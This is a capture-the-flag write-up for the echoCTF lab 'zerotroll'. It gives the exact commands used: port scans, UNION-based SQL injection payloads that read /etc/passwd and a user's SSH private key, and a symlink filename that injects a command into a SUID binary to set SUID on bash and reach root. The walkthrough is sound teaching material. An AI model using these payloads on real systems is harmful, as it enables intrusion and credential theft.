Hackmex-prep
  • echoCTF Writeups
    • badwidth
    • druidmux
    • prisonbreak
    • lightly
    • zerotroll
Powered by GitBook
On this page
  1. echoCTF Writeups

zerotroll

### By b13ss3d ###

Previouslightly

Last updated 8 months ago

There's also a video version, if you want to check it out:

Port Scanning

First we perform a port scan using Rustscan to identify open ports.

rustscan -a 10.0.160.113 -u 5000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.0.160.113:22
Open 10.0.160.113:1337

The scan shows that port 22(SSH) and port 1337(Unknown) is open. Next, we use Nmap to determine the services and their versions running on these ports.

nmap -p22,1337 -sCV -n -Pn -v 10.0.160.113 -oN scan
<SNIP>
Nmap scan report for 10.0.160.113
Host is up (0.20s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c6:23:a2:8e:0a:e9:b5:02:8c:a2:93:46:3a:df:66:39 (RSA)
|   256 4c:f6:61:ec:ce:d3:4a:f2:35:04:2b:1f:80:fd:d9:ed (ECDSA)
|_  256 c2:aa:2c:b8:33:c9:57:88:83:96:7e:90:8e:63:21:d5 (ED25519)
1337/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: A3DCBE94680859E842EED381652F8DF7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • -p <ports>

  • -sCV combines the options -sC and -sV.

  • nmap help: -sC: equivalent to --script=default

  • -sV: Probe open ports to determine service/version info

  • -n: Never do DNS resolution

  • -vvv: Increase verbosity level

  • -oN <file>: Output scan in normal format.

The output of the scan indicates that port 22 is running SSH and port 1337 is running a web server, so we can use a web browser to view the site’s content.

Searching on Google, i found the wollowing site where they gave Admin credentials: https://www.sourcecodester.com/php/15304/toll-tax-management-system-phpoop-free-source-code.html

Those credentials actually worked!!! OMG

SQL Injection

The previous Google results showed also this Github where we realize there are multiple SQL injections in this system.

https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System

To exploit one of them we click on "User List", then on "action" and finally on "Edit".

Then we can read the /etc/passwd file with the following query:

' union select NULL,load_file('/etc/passwd'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- -

Because of the page structure we can see the contents of the file in a good way, so pressing Ctrl+U to see the source code fixes this.

Here we find the first flag, also that "ETSCTF" is a valid user on the target.

SSH Keys

Taking advantage of that we can read files, let's see if the user has a private key that we can use to obtain a shell as him.

' union select NULL,load_file('/home/ETSCTF/.ssh/id_rsa'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- -

He has!!!!!

Again we can press CTRL+U to view the content with a better structure.

Finally we save this key on a file, i saved it with the name id_rsa. Also we have to assign the file with the adecuate permissions:

❯ chmod 600 id_rsa
❯ ssh -i id_rsa ETSCTF@10.0.160.113
The authenticity of host '10.0.160.113 (10.0.160.113)' can't be established.
<SNIP>
ETSCTF@zerotroll:~$

We are in!!!!.

Privilege escalation

We search for files with SUID permissions

ETSCTF@zerotroll:~$ find / -type f -perm -u=s 2>/dev/null

Among the files, we can see the "zero" file which is an uncommon file, so let's see what it does.

ETSCTF@zerotroll:~$ /usr/local/sbin/zero

It just reflects the path of the binary.

Also if we execute it this way:

ETSCTF@zerotroll:~$ ///usr///////local////////sbin/////zero

Since the binary has the setuid permission and the output reflects the first argument, we can use symbolic links to change this path and see if we can inject some commands: First let's see if it reflects the name of the symbolic link, we create a symbolic link called test.

ETSCTF@zerotroll:~$ ln -s /usr/local/sbin/zero test

Now let's create other with a name between backticks like this: Also we put this between single quotes because if we didn't the command would get executed.

ETSCTF@zerotroll:~$ ln -s /usr/local/sbin/zero '`id`'

The command is being executed and as ROOT!!!!!!!!!!!!!!!

Finally we can assign SUID permissions to bash with the following command.

ETSCTF@zerotroll:~$ ln -s /usr/local/sbin/zero '`chmod +s /bin/bash`'

The slashes cause trouble, so instead of placing the absolute path, we can try nesting another command in this case $(which command) that when gets executed is gonna give us the path of the bash.

ETSCTF@zerotroll:~$ ln -s /usr/local/sbin/zero '`chmod +s $(which bash)`'

It worked!!!.

We execute bash with the -p (Turn on privileged mode) flag.

ETSCTF@zerotroll:~$ bash -p
bash-5.1# whoami
root

And we are root!.

Flag paths:

cat /etc/shadow
bash-5.1# cat /proc/1/environ
ls /root

and it does.

zerotroll